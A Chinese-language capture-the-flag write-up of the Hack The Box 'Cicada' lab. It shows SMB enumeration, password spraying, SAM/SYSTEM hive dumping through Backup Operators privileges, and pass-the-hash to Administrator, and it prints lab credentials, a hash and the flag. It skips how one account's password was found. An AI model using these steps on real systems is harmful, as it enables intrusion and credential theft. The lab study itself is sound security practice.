OSCP - HTB - Cicada

主要知識點

SMB 用戶爆破
Backup Operator 組提權

具體步驟

nmap掃描一下先，就像典型的windows 靶機一樣，開放了N多個端口

Nmap scan report for 10.10.11.35
Host is up (0.19s latency).
Not shown: 65522 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-12-22 17:51:40Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after:  2025-08-22T20:24:16
| MD5:   9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
55510/tcp open  msrpc         Microsoft Windows RPC

我們優先利用smbclient 來嘗試攻擊一下smb/netbios服務,發現掛載了smb路徑且無需密碼，其中HR路徑下可以訪問，并存在一個包含密碼 Cicada$M6Corpb*@Lp#nZp!8 的文件，但是沒有用戶名

C:\home\kali\Documents\HTB\Cicada> smbclient -L //10.10.11.35                      
Password for [WORKGROUP\kali]:Sharename       Type      Comment---------       ----      -------ADMIN$          Disk      Remote AdminC$              Disk      Default shareDEV             Disk      HR              Disk      IPC$            IPC       Remote IPCNETLOGON        Disk      Logon server share SYSVOL          Disk      Logon server share 
C:\home\kali\Documents\HTB\Cicada> smbclient //10.10.11.35/HR  -N                 
Try "help" to get a list of possible commands.
smb: \> ls.                                   D        0  Thu Mar 14 20:29:09 2024..                                  D        0  Thu Mar 14 20:21:29 2024Notice from HR.txt                  A     1266  Thu Aug 29 01:31:48 20244168447 blocks of size 4096. 388977 blocks available
smb: \> get 'Notic from HR.txt'
......
......C:\home\kali\Documents\HTB\Cicada> cat Notice\ from\ HR.txt Dear new hire!Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.Your default password is: Cicada$M6Corpb*@Lp#nZp!8To change your password:1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above.
2. Once logged in, navigate to your account settings or profile settings section.
3. Look for the option to change your password. This will be labeled as "Change Password".
4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters.
5. After changing your password, make sure to save your changes.Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password.If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb.Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team!Best regards,
Cicada Corp

我們需要嘗試枚舉一下RID,嘗試guest 和空密碼作為credential,并將所有的id保存成users.txt

C:\home\kali\Documents\HTB\Cicada> crackmapexec smb 10.10.11.35 -u "guest" -p "" --rid-brute | grep SidTypeUser  
/usr/lib/python3/dist-packages/cme/cli.py:35: SyntaxWarning: invalid escape sequence '\ '""",
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
SMB                      10.10.11.35     445    CICADA-DC        500: CICADA\Administrator (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        501: CICADA\Guest (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        502: CICADA\krbtgt (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1104: CICADA\john.smoulder (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1105: CICADA\sarah.dantelia (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1106: CICADA\michael.wrightson (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1108: CICADA\david.orelious (SidTypeUser)
SMB                      10.10.11.35     445    CICADA-DC        1601: CICADA\emily.oscars (SidTypeUser)C:\home\kali\Documents\HTB\Cicada> cat users.txt            
Administrator
krbtgt
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars

接下來依舊使用crackmapexec來爆破rid,得到了合法的用戶名 michael.wrightson

C:\home\kali\Documents\HTB\Cicada> crackmapexec smb 10.10.11.35 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
/usr/lib/python3/dist-packages/cme/cli.py:35: SyntaxWarning: invalid escape sequence '\ '""",
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:49: SyntaxWarning: invalid escape sequence '\p'stringbinding = 'ncacn_np:%s[\pipe\svcctl]' % self.__host
/usr/lib/python3/dist-packages/cme/protocols/smb/smbexec.py:93: SyntaxWarning: invalid escape sequence '\{'command = self.__shell + 'echo '+ data + ' ^> \\\\127.0.0.1\\{}\\{} 2^>^&1 > %TEMP%\{} & %COMSPEC% /Q /c %TEMP%\{} & %COMSPEC% /Q /c del %TEMP%\{}'.format(self.__share_name, self.__output, self.__batchFile, self.__batchFile, self.__batchFile)
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:324: SyntaxWarning: invalid escape sequence '\S'self.conn.execute_cmd("reg save HKLM\SAM C:\\windows\\temp\\SAM && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
/usr/lib/python3/dist-packages/cme/protocols/winrm.py:338: SyntaxWarning: invalid escape sequence '\S'self.conn.execute_cmd("reg save HKLM\SECURITY C:\\windows\\temp\\SECURITY && reg save HKLM\SYSTEM C:\\windows\\temp\\SYSTEM")
SMB         10.10.11.35     445    CICADA-DC        [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\Administrator:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\krbtgt:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE 
SMB         10.10.11.35     445    CICADA-DC        [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8

接下來使用enum4linux-ng與剛發現的用戶名密碼來發現更多的信息，發現了又一組用戶名密碼

C:\home\kali\Documents\HTB\Cicada> enum4linux-ng -A -u michael.wrightson -p 'Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -t 10
......
......
'1108':username: david.oreliousname: (null)acb: '0x00000210'description: Just in case I forget my password is aRt$Lp#7t*VQ!3

由于remote server開放了5895端口，則可以考慮使用evil-winrm來嘗試登錄，并可以獲得第一個flag

C:\home\kali\Documents\HTB\Cicada> evil-winrm -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' -i 10.10.11.35                      Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
di*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dirDirectory: C:\Users\emily.oscars.CICADA\DesktopMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        12/22/2024  11:58 AM             34 user.txt

查看當前ID的信息whoami \all,其中 Backup Operator組比較顯眼

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami / all
whoami.exe : ERROR: Invalid argument/option - '/'.+ CategoryInfo          : NotSpecified: (ERROR: Invalid argument/option - '/'.:String) [], RemoteException+ FullyQualifiedErrorId : NativeCommandError
Type "WHOAMI /?" for usage.whoami*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /allUSER INFORMATION
----------------User Name           SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601GROUP INFORMATION
-----------------Group Name                                 Type             SID          Attributes
========================================== ================ ============ ==================================================
Everyone                                   Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators                   Alias            S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access    Alias            S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level       Label            S-1-16-12288PRIVILEGES INFORMATION
----------------------Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

從Windows Privilege Escalation: SeBackupPrivilege - Hacking Articles可以得到提權的方法

*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> mkdir backupDirectory: C:\Users\emily.oscars.CICADA\DesktopMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
d-----        12/23/2024  10:53 AM                backupcd*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> cd backup
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop\backup> reg save hklm\sam c:\Users\emily.oscars.CICADA\Desktop\backup\sam
The operation completed successfully.*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop\backup> reg save hklm\system c:\Users\emily.oscars.CICADA\Desktop\backup\system
The operation completed successfully.*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop\backup> download samInfo: Downloading C:\Users\emily.oscars.CICADA\Desktop\backup\sam to samInfo: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop\backup> download systemInfo: Downloading C:\Users\emily.oscars.CICADA\Desktop\backup\system to systemInfo: Download successful!

在下載好sam與system文件后，在本地使用pypykatz將他們合并,并可以發現 Administrator用戶的密碼的Hash值為2b87e7c93a3e8a0ea4a581937016f341

C:\home\kali\Documents\HTB\Cicada> pypykatz registry --sam sam system
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

繼續嘗試用evil-winrm來登錄,提權成功

C:\home\kali\Documents\HTB\Cicada> evil-winrm -u Administrator -H "2b87e7c93a3e8a0ea4a581937016f341" -i 10.10.11.35    Evil-WinRM shell v3.7Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machineData: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completionInfo: Establishing connection to remote endpoint*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dirDirectory: C:\Users\Administrator\DesktopMode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-ar---        12/22/2024  11:58 AM             34 root.txt*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
76d6eb78d62c09cbc9d3e957ab8472fe
*Evil-WinRM* PS C:\Users\Administrator\Desktop>